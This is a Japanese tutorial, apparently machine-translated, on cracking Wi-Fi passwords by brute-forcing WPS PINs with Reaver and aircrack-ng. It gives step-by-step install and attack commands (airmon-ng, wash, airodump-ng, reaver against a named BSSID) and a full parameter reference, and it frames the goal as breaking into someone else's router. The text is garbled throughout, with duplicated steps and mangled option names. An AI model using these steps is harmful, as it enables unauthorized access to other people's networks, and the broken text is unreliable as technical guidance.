をクラックするこの記事では、主にlinuxでripを使って無線wifiパスワードをクラックする手順を紹介します。友達が必要とするものは以下のとおりです。ワイヤレスルーターのセキュリティを破るための徹底的なPINコード
インストール:
ソースダウンロード - unpack - ダウンロードtar-xzvf reaver-1.4.tar.gz
必要なソフトウェアの依存関係やツールをインストールしてください< Br>リーバーをコンパイルする前に、pcaplibなどのツールをインストールする必要があります。その後、aircrack-ngが必要です。sudo apt-getインストールlibpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
コンパイルおよびインストール
設定そしてReaverをコンパイルする
cd reaver-1.4
cd src
./configure
make
aircrack-ngソースコードをダウンロードし、Ubuntu 12.04バージョンからaircrack-ngをコンパイルする。これはソフトウェアリポジトリのバージョンに含まれていますが、インターネットからソースコードをダウンロードしてコンパイルおよびインストールすることができます。 aircrack-ngが既に存在する場合は、インストールする必要はありません。 ./configure
make
sudo install
unpack tar -xzvf reaver-1.4.tar.gz
必要なソフトウェアの依存関係とツールをインストールする
あなたはreaverをコンパイルする前にpcaplibをインストールする必要があります。ツールは、あなたが必要ですaircrack-ng sudo apt-get libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
コンパイルとインストール
Reaverの設定とコンパイル
cd reaver-1.4 cd src ./configure
インストールReaver
sudo make install
方法:
1入力:airmon-ng start wlan0リスニングモードをオンにします(画面に、8187Lドライバのロードに成功したことが示されます。 2入力:wash -i mon0 -C WPSを有効にするすべてのワイヤレス経路を表示しても応答がない無応答Ctrl + Cを押してプロセスを終了し、PJが必要な宛先ルーティングMACを書き留めます。
3入力:airodump-ng mon0 NICはすべてのチャネルを無差別モードでスキャンし、すべてのAP情報(AP信号強度、ESSID、MAC、チャネル、暗号化などを含む)を表示します。スキャンを終了するにはCtrl + Cを押します。
注:相手のワイヤレスルーティング情報がわかっている場合は、手順2、手順3を省略できます。
4入力:reaver -i mon0 -b MAC -a -S -vv排気ピンコードの開始
注:Ctrlキーを押しながらCキーを押すといつでも保存プロセスを終了し、次にカーソル制御ボタン "ld"を押すことができます。次にEnterを押すと、処理を続行できます。
戦闘私はリーダーを入力しました-i mon0 -b MACD8:5D:4C:37:78:F6 -a -S -vv -d 0(スピードアップするために-d 0を追加しました)、画面のフラッシュだけを見て… …かっこいい!
reaverパラメータの詳細
必須パラメータ
-i、– interface =< wlan> NIC監視インターフェースを使用するための監視モードインターフェースの名前、通常mon0
-b 、– bssid =< mac>ターゲットAPのBSSID
APのMACアドレス
オプションの引数:オプションのパラメータ
-m、– mac =< mac>ホストシステムのMAC <ローカルMACアドレスを指定します。
-e、– essid =< ssid>ターゲットAPのESSID
通常はルーターのESSIDです。
-c、– channel =< channel>を指定しないでください。インターフェイスの802.11チャネルを設定します(-fを意味します)。シグナルのチャネルが指定されていない場合は、自動的にスキャンされます。
-o、– out-file =< file>出力をログファイルに送信する[stdout]
ログファイルの出力
-s、– session =< file>前のセッションファイルの復元
回復の進捗ファイル
-C、– exec =< command>指定されたコマンドの実行ピンの回復に成功しました。
コマンドの成功後にパルスを送信します。-D、– daemonize DaemonizeリーダーをDaemonに設定します。
-a、– auto AuターゲットAPに最適な高度なオプションを検出するには
ターゲットAPの高度なパラメータを自動的に検出するには
-f、– fixedチャンネルホッピングを無効にする
-5、– 5ghz 5GHzを使用する802.11チャネル
5Gチャネルの使用
-v、– verbose重要でない警告を表示します(詳細は-vv)。重要でない警告メッセージを表示する-vvは、詳細を表示することができます。
-q、– Quiet重要なメッセージのみを表示する
重要な情報のみを表示する
-h、– helpヘルプを表示する
ヘルプを表示する
詳細オプション:詳細オプション
-p、– pin =< wps pin>指定した4桁または8桁のWPSピンを使用する
指定した4桁または8ビットのピンコードを使用する
-d、– delay =< seconds>ピン試行間の遅延を設定する[1]
間隔、デフォルトは1秒
-l、– lock-delay =<秒> APがWPSピンの試行をロックする場合に待機する時間を設定します[60]
WPSのロック後のAP待機時間
-g、– max-attempts =< num> num回のピン試行の後に終了
最大ピン回数
Reaverのパラメータ
&x;&x;– f Ail-wait =< seconds>予期しない失敗が10回発生した後にスリープする時間を設定します[0]。予期しない失敗が発生した後10待機、デフォルトは0秒
-r、– recurring-delay =< x: y> xピン試行ごとにy秒間スリープ
xピンごとにy秒待機
-t、– timeout =<秒>受信タイムアウト期間を設定する[5]
受信タイムアウト、デフォルトの5秒
-T、 - m57-timeout =< seconds> M5 /M7のタイムアウト時間を設定する[0.20]
M5 /M7のタイムアウト、デフォルトの0.2秒
-A、– no- APと関連付けない(関連付けは別のアプリケーションによって行われる必要があります)
APに接続しない(接続プロセスを完了するには他の手順が必要です)
-N、– no-nacks次の場合にNACKメッセージを送信しない順不同パケットが受信されている
NACK情報を送信しない(固定されている場合は、このパラメータを試すことができます)
-S、– dh-small小さなDHキーを使用してクラック速度を向上させるキー値の増加速度(推奨)
- L、 - ndash; ignore-locksターゲットAPによって報告されたロック状態を無視する
無視するAPによって報告されたロックステータス
-E、 - ndap; EAP FAILパケットで各WPSセッションを終了
EAP失敗パケットを受信したときはいつでも、WPSプロセスは終了します。-n、 - nd Target Target AP常にNACKを送信する[自動]
常にNACKをターゲットAPに送信する、デフォルトの自動
-w、– win7 Windowsを模倣する
Windows
7登録機関[False]
win7登録をシミュレートする、デフォルトでは、
Ps:ワイヤレスに影響を与える要因はたくさんありますので、パラメータ間の調整は非常に重要ですが、もちろん最も重要なものは信号によって異なります。
原則の詳細:
PINコードとは何ですか?
ワイヤレスルータのデバイスラベルに印刷されている一連の8桁の文字列は、もちろんワイヤレスルータの管理インターフェイスに存在し、変更することができます。
PINの使用は何ですか?
管理ソフトウェア(TP-LINK QSSソフトウェアなど)をサポートするワイヤレスネットワークカードで、ワイヤレスルーターデバイスに8桁の文字列を入力して、暗号化されたワイヤレスルーターに正常にログインします。
PINを使い果たすとはどういう意味ですか?
ワイヤレスルーターのPINの範囲(8ビットの純粋な数字)を知っているので、現在ほとんどのデバイスでWPSがオンになっているので、PINはワイヤレスルーターのセキュリティを侵害するために十分です。 *理論*実現可能性